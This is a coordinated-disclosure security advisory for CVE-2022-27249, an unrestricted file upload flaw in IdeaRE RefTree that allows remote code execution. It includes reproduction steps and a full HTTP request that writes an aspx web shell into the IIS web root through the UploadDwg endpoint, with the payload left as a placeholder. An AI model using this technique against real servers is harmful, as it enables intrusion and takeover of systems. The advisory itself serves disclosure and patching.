===============================================================================
                  title: IdeaRE RefTree Remote Code Execution
                product: IdeaRE RefTree < 2021.09.17
     vulnerability type: Unrestricted File Upload
                 CVE ID: CVE-2022-27249
               severity: High
           CVSSv3 score: 8.8
          CVSSv3 vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
                  found: 2021-09-13
                     by: Savino Sisco saviosisco@gmail.com
===============================================================================

[EXECUTIVE SUMMARY]
RefTree is a web application made for managing complex real estate situations.
Among other features, it offers the possibility for authenticated users
to upload and download DWG (CAD drawings) files for buildings.

During a penetration test activity, an "Unrestricted File Upload" vulnerability
was found which leverages the upload feature to upload a file anywhere on the 
target system.

By uploading a malicious web page, like an aspx web shell, to the server's
web root it is possible to achive code execution by just navigating to the
malicious page with a web browser.

[VULNERABLE VERSIONS]
IdeaRE RefTree < 2021.09.17

[TECHNICAL DETAILS]
It is possible to reproduce the issue following these steps:
1. Log into the application to get a valid session cookie
2. Get a valid "ObjId" from the application (the ID of a building to associate
   the file to)
3. Use the API endpoint '/CaddemServiceJS/CaddemService.svc/rest/UploadDwg'
   to upload a file on the target system, for example a web shell in the
   server's web root
4. Navigate to the new page with a web browser to trigger code execution


Example of the HTTP request to the Upload endpoint:

POST /CaddemServiceJS/CaddemService.svc/rest/UploadDwg HTTP/2
Host: [REDACTED]
Cookie: ASP.NET_SessionId=b1125gke23enpul1ukeu1ouy
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 2211
Origin: https://[REDACTED]
Referer: https://[REDACTED]/Reftreespace/

{
  "FileContent": "[BASE64_PAYLOAD]",
  "DwgName": "C:\\inetpub\\wwwroot\\webshell.aspx",
  "UploadType": "WorkingCopy",
  "ObjId": 4774726,
  "ObjType": 5,
  "UpdateState": true,
  "DwgOp": 23
}


HTTP/2 200 OK
Cache-Control: private
Content-Type: application/json; charset=utf-8
Server: Microsoft-IIS/10.0
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: [REDACTED]
X-Powered-By: ASP.NET
Date: Fri, 10 Sep 2021 15:00:53 GMT
Content-Length: 24

{"UploadDwgResult":null}


[VULNERABILITY REFERENCE]
The following CVE ID was allocated to track the vulnerabilities:
CVE-2022-27249


[DISCLOSURE TIMELINE]
2021-09-13  Vulnerability disclosed to our customer and the vendor.
            Vendor acknowledged the issue.
2021-09-17  Vendor released a fix for the software.
2021-10-15  The vulnerability was rechecked in the newer version to confirm 
            that is was indeed fixed.
2022-03-15  Researcher requested to publicly disclose the issue; public
            coordinated disclosure.

[RESOLUTION]
Update the software to a version >= 2021.09.17

Savino Sisco <saviosisco@gmail.com>
https://www.linkedin.com/in/savino-sisco/